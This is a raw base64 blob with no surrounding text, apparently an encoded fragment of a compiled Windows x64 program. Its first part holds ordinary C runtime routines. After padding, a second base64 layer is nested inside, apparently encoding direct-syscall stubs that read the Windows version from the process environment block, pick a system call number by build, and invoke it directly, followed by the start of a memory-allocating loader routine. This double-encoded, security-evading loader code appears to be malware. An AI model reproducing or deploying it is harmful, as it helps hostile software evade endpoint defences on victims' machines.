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YmdnQVFBQUFDZ1BoSmdBQUFCbWdiZ2dBUUFBV2lrUGhKQUFBQUJtZ2JnZ0FRQUFPVGdQaElnQUFBQm1nYmdnQVFBQTF6b1BoSUFBQUFCbWdiZ2dBUUFBcXo5MGZHYUJ1Q0FCQUFEdVFuUjRab0c0SUFFQUFHTkZkSFJtZ2JnZ0FRQUF1a2QwY0dhQnVDQUJBQUM3UjNSc1pvRzRJQUVBQUdGS2RHaG1nYmdnQVFBQVlrcDBaT3RwdUQ0QUFBRHJZN2crQUFBQTYxeTRQd0FBQU90VnVFQUFBQURyVHJoQkFBQUE2MGU0UVFBQUFPdEF1RUVBQUFEck9iaEJBQUFBNnpLNFFRQUFBT3NydUVFQUFBRHJKTGhCQUFBQTZ4MjRRUUFBQU9zV3VFRUFBQURyRDdoQkFBQUE2d2k0UVFBQUFPc0J3MG1KeWc4RncyVklpd1FsWUFBQUFJTzRHQUVBQUFaMERvTzRHQUVBQUFwMFVPay9BUUFBZzdnY0FRQUFBWFFmZzdnY0FRQUFBZytFemdBQUFJTzRIQUVBQUFNUGhNZ0FBQURwRndFQUFHYUJ1Q0FCQUFDd0hRK0Vud0FBQUdhQnVDQUJBQUN4SFErRWx3QUFBT24wQUFBQVpvRzRJQUVBQUFBb0Q0U1lBQUFBWm9HNElBRUFBRm9wRDRTUUFBQUFab0c0SUFFQUFEazRENFNJQUFBQVpvRzRJQUVBQU5jNkQ0U0FBQUFBWm9HNElBRUFBS3MvZEh4bWdiZ2dBUUFBN2tKMGVHYUJ1Q0FCQUFCalJYUjBab0c0SUFFQUFMcEhkSEJtZ2JnZ0FRQUF1MGQwYkdhQnVDQUJBQUJoU25Sb1pvRzRJQUVBQUdKS2RHVHJhYmc1QUFBQTYyTzRPUUFBQU90Y3VEb0FBQURyVmJnN0FBQUE2MDY0UEFBQUFPdEh1RHdBQUFEclFMZzhBQUFBNnptNFBBQUFBT3N5dUR3QUFBRHJLN2c4QUFBQTZ5UzRQQUFBQU9zZHVEd0FBQURyRnJnOEFBQUE2dys0UEFBQUFPc0l1RHdBQUFEckFjTkppY29QQmNObFNJc0VKV0FBQUFDRHVCZ0JBQUFHZEE2RHVCZ0JBQUFLZEZEcFB3RUFBSU80SEFFQUFBRjBINE80SEFFQUFBSVBoTTRBQUFDRHVCd0JBQUFERDRUSUFBQUE2UmNCQUFCbWdiZ2dBUUFBc0IwUGhKOEFBQUJtZ2JnZ0FRQUFzUjBQaEpjQUFBRHA5QUFBQUdhQnVDQUJBQUFBS0ErRW1BQUFBR2FCdUNBQkFBQmFLUStFa0FBQUFHYUJ1Q0FCQUFBNU9BK0VpQUFBQUdhQnVDQUJBQURYT2crRWdBQUFBR2FCdUNBQkFBQ3JQM1I4Wm9HNElBRUFBTzVDZEhobWdiZ2dBUUFBWTBWMGRHYUJ1Q0FCQUFDNlIzUndab0c0SUFFQUFMdEhkR3htZ2JnZ0FRQUFZVXAwYUdhQnVDQUJBQUJpU25SazYybTRQd0FBQU90anVEOEFBQURyWExoQUFBQUE2MVc0UVFBQUFPdE91RUlBQUFEclI3aENBQUFBNjBDNFFnQUFBT3M1dUVJQUFBRHJNcmhDQUFBQTZ5dTRRZ0FBQU9za3VFSUFBQURySGJoQ0FBQUE2eGE0UWdBQUFPc1B1RUlBQUFEckNMaENBQUFBNndIRFNZbktEd1hEWlVpTEJDVmdBQUFBZzdnWUFRQUFCblFPZzdnWUFRQUFDblJRNlQ4QkFBQ0R1QndCQUFBQmRCK0R1QndCQUFBQ0Q0VE9BQUFBZzdnY0FRQUFBdytFeUFBQUFPa1hBUUFBWm9HNElBRUFBTEFkRDRTZkFBQUFab0c0SUFFQUFMRWRENFNYQUFBQTZmUUFBQUJtZ2JnZ0FRQUFBQ2dQaEpnQUFBQm1nYmdnQVFBQVdpa1BoSkFBQUFCbWdiZ2dBUUFBT1RnUGhJZ0FBQUJtZ2JnZ0FRQUExem9QaElBQUFBQm1nYmdnQVFBQXF6OTBmR2FCdUNBQkFBRHVRblI0Wm9HNElBRUFBR05GZEhSbWdiZ2dBUUFBdWtkMGNHYUJ1Q0FCQUFDN1IzUnNab0c0SUFFQUFHRktkR2htZ2JnZ0FRQUFZa3AwWk90cHVDTUFBQURyWTdnakFBQUE2MXk0SkFBQUFPdFZ1Q1VBQUFEclRyZ21BQUFBNjBlNEpnQUFBT3RBdUNZQUFBRHJPYmdtQUFBQTZ6SzRKZ0FBQU9zcnVDWUFBQURySkxnbUFBQUE2eDI0SmdBQUFPc1d1Q1lBQUFEckQ3Z21BQUFBNndpNEpnQUFBT3NCdzBtSnlnOEZ3MlZJaXdRbFlBQUFBSU80R0FFQUFBWjBEb080R0FFQUFBcDBVT2svQVFBQWc3Z2NBUUFBQVhRZmc3Z2NBUUFBQWcrRXpnQUFBSU80SEFFQUFBTVBoTWdBQUFEcEZ3RUFBR2FCdUNBQkFBQ3dIUStFbndBQUFHYUJ1Q0FCQUFDeEhRK0Vsd0FBQU9uMEFBQUFab0c0SUFFQUFBQW9ENFNZQUFBQVpvRzRJQUVBQUZvcEQ0U1FBQUFBWm9HNElBRUFBRGs0RDRTSUFBQUFab0c0SUFFQUFOYzZENFNBQUFBQVpvRzRJQUVBQUtzL2RIeG1nYmdnQVFBQTdrSjBlR2FCdUNBQkFBQmpSWFIwWm9HNElBRUFBTHBIZEhCbWdiZ2dBUUFBdTBkMGJHYUJ1Q0FCQUFCaFNuUm9ab0c0SUFFQUFHSktkR1RyYWJqNUFBQUE2Mk80K1FBQUFPdGN1QXNCQUFEclZiZ09BUUFBNjA2NEZBRUFBT3RIdUJjQkFBRHJRTGdaQVFBQTZ6bTRIUUVBQU9zeXVCOEJBQURySzdnaEFRQUE2eVM0SWdFQUFPc2R1Q01CQUFEckZyZ2pBUUFBNncrNEtBRUFBT3NJdUNnQkFBRHJBY05KaWNvUEJjTmxTSXNFSldBQUFBQ0R1QmdCQUFBR2RBNkR1QmdCQUFBS2RGRHBQd0VBQUlPNEhBRUFBQUYwSDRPNEhBRUFBQUlQaE00QUFBQ0R1QndCQUFBREQ0VElBQUFBNlJjQkFBQm1nYmdnQVFBQXNCMFBoSjhBQUFCbWdiZ2dBUUFBc1IwUGhKY0FBQURwOUFBQUFHYUJ1Q0FCQUFBQUtBK0VtQUFBQUdhQnVDQUJBQUJhS1ErRWtBQUFBR2FCdUNBQkFBQTVPQStFaUFBQUFHYUJ1Q0FCQUFEWE9nK0VnQUFBQUdhQnVDQUJBQUNyUDNSOFpvRzRJQUVBQU81Q2RIaG1nYmdnQVFBQVkwVjBkR2FCdUNBQkFBQzZSM1J3Wm9HNElBRUFBTHRIZEd4bWdiZ2dBUUFBWVVwMGFHYUJ1Q0FCQUFCaVNuUms2Mm00SGdBQUFPdGp1QjRBQUFEclhMZ2ZBQUFBNjFXNElBQUFBT3RPdUNFQUFBRHJSN2doQUFBQTYwQzRJUUFBQU9zNXVDRUFBQURyTXJnaEFBQUE2eXU0SVFBQUFPc2t1Q0VBQUFEckhiZ2hBQUFBNnhhNElRQUFBT3NQdUNFQUFBRHJDTGdoQUFBQTZ3SERTWW5LRHdYRFpVaUxCQ1ZnQUFBQWc3Z1lBUUFBQm5RT2c3Z1lBUUFBQ25SUTZUOEJBQUNEdUJ3QkFBQUJkQitEdUJ3QkFBQUNENFRPQUFBQWc3Z2NBUUFBQXcrRXlBQUFBT2tYQVFBQVpvRzRJQUVBQUxBZEQ0U2ZBQUFBWm9HNElBRUFBTEVkRDRTWEFBQUE2ZlFBQUFCbWdiZ2dBUUFBQUNnUGhKZ0FBQUJtZ2JnZ0FRQUFXaWtQaEpBQUFBQm1nYmdnQVFBQU9UZ1BoSWdBQUFCbWdiZ2dBUUFBMXpvUGhJQUFBQUJtZ2JnZ0FRQUFxejkwZkdhQnVDQUJBQUR1UW5SNFpvRzRJQUVBQUdORmRIUm1nYmdnQVFBQXVrZDBjR2FCdUNBQkFBQzdSM1JzWm9HNElBRUFBR0ZLZEdobWdiZ2dBUUFBWWtwMFpPdHB1QTBBQUFEclk3Z05BQUFBNjF5NERnQUFBT3RWdUE4QUFBRHJUcmdRQUFBQTYwZTRFQUFBQU90QXVCQUFBQURyT2JnUUFBQUE2eks0RUFBQUFPc3J1QkFBQUFEckpMZ1FBQUFBNngyNEVBQUFBT3NXdUJBQUFBRHJEN2dRQUFBQTZ3aTRFQUFBQU9zQncwbUp5ZzhGdzJWSWl3UWxZQUFBQUlPNEdBRUFBQVowRG9PNEdBRUFBQXAwVU9rL0FRQUFnN2djQVFBQUFYUWZnN2djQVFBQUFnK0V6Z0FBQUlPNEhBRUFBQU1QaE1nQUFBRHBGd0VBQUdhQnVDQUJBQUN3SFErRW53QUFBR2FCdUNBQkFBQ3hIUStFbHdBQUFPbjBBQUFBWm9HNElBRUFBQUFvRDRTWUFBQUFab0c0SUFFQUFGb3BENFNRQUFBQVpvRzRJQUVBQURrNEQ0U0lBQUFBWm9HNElBRUFBTmM2RDRTQUFBQUFab0c0SUFFQUFLcy9kSHhtZ2JnZ0FRQUE3a0owZUdhQnVDQUJBQUJqUlhSMFpvRzRJQUVBQUxwSGRIQm1nYmdnQVFBQXUwZDBiR2FCdUNBQkFBQmhTblJvWm9HNElBRUFBR0pLZEdUcmFiZ3pBQUFBNjJPNE13QUFBT3RjdURRQUFBRHJWYmcxQUFBQTYwNjROZ0FBQU90SHVEWUFBQURyUUxnMkFBQUE2em00TmdBQUFPc3l1RFlBQUFEcks3ZzJBQUFBNnlTNE5nQUFBT3NkdURZQUFBRHJGcmcyQUFBQTZ3KzROZ0FBQU9zSXVEWUFBQURyQWNOSmljb1BCY05sU0lzRUpXQUFBQUNEdUJnQkFBQUdkQTZEdUJnQkFBQUtkRkRwUHdFQUFJTzRIQUVBQUFGMEg0TzRIQUVBQUFJUGhNNEFBQUNEdUJ3QkFBQURENFRJQUFBQTZSY0JBQUJtZ2JnZ0FRQUFzQjBQaEo4QUFBQm1nYmdnQVFBQXNSMFBoSmNBQUFEcDlBQUFBR2FCdUNBQkFBQUFLQStFbUFBQUFHYUJ1Q0FCQUFCYUtRK0VrQUFBQUdhQnVDQUJBQUE1T0ErRWlBQUFBR2FCdUNBQkFBRFhPZytFZ0FBQUFHYUJ1Q0FCQUFDclAzUjhab0c0SUFFQUFPNUNkSGhtZ2JnZ0FRQUFZMFYwZEdhQnVDQUJBQUM2UjNSd1pvRzRJQUVBQUx0SGRHeG1nYmdnQVFBQVlVcDBhR2FCdUNBQkFBQmlTblJrNjJtNFBBQUFBT3RqdUR3QUFBRHJYTGc5QUFBQTYxVzRQZ0FBQU90T3VEOEFBQURyUjdnL0FBQUE2MEM0UHdBQUFPczV1RDhBQUFEck1yZy9BQUFBNnl1NFB3QUFBT3NrdUQ4QUFBRHJIYmcvQUFBQTZ4YTRQd0FBQU9zUHVEOEFBQURyQ0xnL0FBQUE2d0hEU1luS0R3WERaaTRQSDRRQUFBQUFBRUZYUVZaQlZVRlVWVmUvQUJBQUFGWk1pYzVUU0lIc0dBWUFBRW1MbVlBQUFBQk1pWVFrMkFFQUFJbVVKSmdCQUFCSWlZd2tvQUVBQUVqSGhDU1lBQUFBQUFBQUFNZUVKS0FBQUFBQUFBQUFTTWVFSkxBQkFBQUFBQUFBeDRRa3VBRUFBQUFBQUFCSXg0UWt3QUVBQUFBQUFBQkl4NFFreUFFQUFBQUFBQURIaENUUUFRQUFJZ2dBQUVqSGhDVG9BUUFBQUFBQUFFakhoQ1R3QVFBQUFBQUFBRWpIaENUNEFRQUFBQUFBQUVqSGhDUUFBZ0FBQUFBQUFNZUVKT0FCQUFBQUFBQUFRZitSaUFBQUFFRzRBQkFBQURIU1NJbkIvOU5JaWNOSWhjQjFOK25EQ2dBQVppNFBINFFBQUFBQUFFaUxycGdBQUFBQi8vK1dpQUFBQUVtSjJFR0orVEhTU0luQi85VklpY0